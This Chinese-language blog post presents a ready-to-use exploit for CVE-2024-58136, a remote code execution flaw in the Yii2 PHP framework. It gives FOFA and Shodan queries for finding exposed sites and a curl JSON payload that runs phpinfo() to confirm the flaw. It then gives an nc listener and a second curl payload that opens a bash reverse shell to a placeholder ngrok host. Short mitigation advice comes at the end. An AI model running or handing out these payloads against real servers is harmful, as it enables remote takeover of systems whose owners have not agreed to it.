优秀的编程知识分享平台

网站首页 > 技术文章 正文

CVE-2024-58136漏洞, 一条CURL命令实现Yii2 PHP 框架 RCE

nanyue 2025-09-29 08:50:04 技术文章 2 ℃

CVE-2024-58136是Yii2 PHP 框架中的一个高危远程代码执行 (RCE)漏洞。该漏洞源于密钥验证不当,允许攻击者使用受控参数实例化任意 PHP 类,从而导致 RCE。

本文演示了如何在实际应用程序中发现此漏洞,如何获取 Recevese Shell 和缓解措施。

CVE-2024-58136 的根本原因

参考:
https://attackerkb.com/topics/U2DdokjYhB/cve-2024-58136/rapid7-analysis


CVE-2024-58136 — RCE PoC利用

发现目标

1. FOFA 查询

title= “yii” || title = “X-Powered-By: Yii”

2. Shodan查询

在 Shodan 中使用它:

http.headers:“X-Powered-By: Yii”

3.PoC漏洞

步骤 1:phpinfo() 测试确认 RCE

curl -k -X POST https://target/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}'

检查响应是否包含phpinfo()PHP Version等,探测是否有此漏洞。

步骤2:反向Shell载荷

设置和监听器

nc  -lvnp  9999

CVE-2024-58136 — RCE PoC

curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/9999 0>&1'\''"}}'


补丁

  • 将 Yii2 升级到2.0.52或更高版本
  • 添加服务器端 WAF 来阻止行为键__classas例如on
  • 避免接受来自不受信任的客户端的原始 JSON。

Tags:

最近发表
标签列表